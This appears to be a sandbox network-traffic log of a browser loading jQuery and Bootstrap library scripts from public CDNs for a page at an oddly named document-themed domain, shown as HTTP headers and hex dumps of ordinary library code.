                                                                                        2025-03-20 17:47:54 UTC16384INData Raw: 6f 5d 29 7b 69 66 28 62 2e 65 76 65 6e 74 73 29 66 6f 72 28 64 20 69 6e 20 62 2e 65 76 65 6e 74 73 29 65 5b 64 5d 3f 72 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 63 2c 64 29 3a 72 2e 72 65 6d 6f 76 65 45 76 65 6e 74 28 63 2c 64 2c 62 2e 68 61 6e 64 6c 65 29 3b 63 5b 57 2e 65 78 70 61 6e 64 6f 5d 3d 76 6f 69 64 20 30 7d 63 5b 58 2e 65 78 70 61 6e 64 6f 5d 26 26 28 63 5b 58 2e 65 78 70 61 6e 64 6f 5d 3d 76 6f 69 64 20 30 29 7d 7d 7d 29 2c 72 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 64 65 74 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4b 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 2c 72 65 6d 6f 76 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4b 61 28 74 68 69 73 2c 61 29 7d 2c 74 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29
                                                                                        Data Ascii: o]){if(b.events)for(d in b.events)e[d]?r.event.remove(c,d):r.removeEvent(c,d,b.handle);c[W.expando]=void 0}c[X.expando]&&(c[X.expando]=void 0)}}}),r.fn.extend({detach:function(a){return Ka(this,a,!0)},remove:function(a){return Ka(this,a)},text:function(a)
                                                                                        2025-03-20 17:47:54 UTC4061INData Raw: 46 75 6e 63 74 69 6f 6e 28 61 29 3f 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 28 74 68 69 73 29 2e 77 72 61 70 49 6e 6e 65 72 28 61 2e 63 61 6c 6c 28 74 68 69 73 2c 62 29 29 7d 29 3a 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 72 28 74 68 69 73 29 2c 63 3d 62 2e 63 6f 6e 74 65 6e 74 73 28 29 3b 63 2e 6c 65 6e 67 74 68 3f 63 2e 77 72 61 70 41 6c 6c 28 61 29 3a 62 2e 61 70 70 65 6e 64 28 61 29 7d 29 7d 2c 77 72 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 28 74 68 69 73 29 2e 77 72 61 70 41 6c 6c 28 62 3f 61 2e 63 61 6c 6c 28 74 68 69 73 2c
                                                                                        Data Ascii: Function(a)?this.each(function(b){r(this).wrapInner(a.call(this,b))}):this.each(function(){var b=r(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=r.isFunction(a);return this.each(function(c){r(this).wrapAll(b?a.call(this,


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.2.1649765104.18.11.2074436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:54 UTC732OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                                        Host: maxcdn.bootstrapcdn.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://incomestatementdocument.classical.it.com
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:54 UTC966INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:47:54 GMT
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        CDN-PullZone: 252412
                                                                                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                        CDN-RequestCountryCode: US
                                                                                        Vary: Accept-Encoding
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=31919000
                                                                                        ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                                        Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                        CDN-ProxyVer: 1.06
                                                                                        CDN-RequestPullSuccess: True
                                                                                        CDN-RequestPullCode: 200
                                                                                        CDN-CachedAt: 12/04/2024 01:55:10
                                                                                        CDN-EdgeStorageId: 1067
                                                                                        timing-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CDN-Status: 200
                                                                                        CDN-RequestTime: 0
                                                                                        CDN-RequestId: a9917834af464eee5789f9debe98d293
                                                                                        CDN-Cache: HIT
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 107416
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923709929c05443e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:47:54 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                                        Data Ascii: 7bed/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e
                                                                                        Data Ascii: ine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defin
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c
                                                                                        Data Ascii: function(n){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isEl
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 20 65 3d 6f 2e 45 76 65 6e 74 28 75 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73
                                                                                        Data Ascii: e=o.Event(u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._des
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 26 70 28 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74
                                                                                        Data Ascii: &p(s).removeClass(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 6d 6f 75 73 65 65 6e 74 65 72 22 2b 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d
                                                                                        Data Ascii: mouseenter"+i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64
                                                                                        Data Ascii: l),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d
                                                                                        Data Ascii: (!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)}
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 74 28 64 2e 53 4c 49 44 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d
                                                                                        Data Ascii: t(d.SLID,{relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).rem
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73
                                                                                        Data Ascii: DATA_API,function(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collaps


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.2.1649764104.18.11.2074436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:54 UTC714OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                                                        Host: stackpath.bootstrapcdn.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:54 UTC965INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:47:54 GMT
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        CDN-PullZone: 252412
                                                                                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                        CDN-RequestCountryCode: US
                                                                                        Vary: Accept-Encoding
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=31919000
                                                                                        ETag: W/"67176c242e1bdc20603c878dee836df3"
                                                                                        Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                                        CDN-ProxyVer: 1.07
                                                                                        CDN-RequestPullSuccess: True
                                                                                        CDN-RequestPullCode: 200
                                                                                        CDN-CachedAt: 12/15/2024 13:11:59
                                                                                        CDN-EdgeStorageId: 1232
                                                                                        timing-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CDN-Status: 200
                                                                                        CDN-RequestTime: 0
                                                                                        CDN-RequestId: 2594ac6f0c887eb2b7bbc5b18049c76f
                                                                                        CDN-Cache: HIT
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 41635
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923709929c830c9e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:47:54 UTC404INData Raw: 37 62 65 65 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                                                        Data Ascii: 7bee/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e
                                                                                        Data Ascii: ine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defin
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44 3a
                                                                                        Data Ascii: Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID:
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e
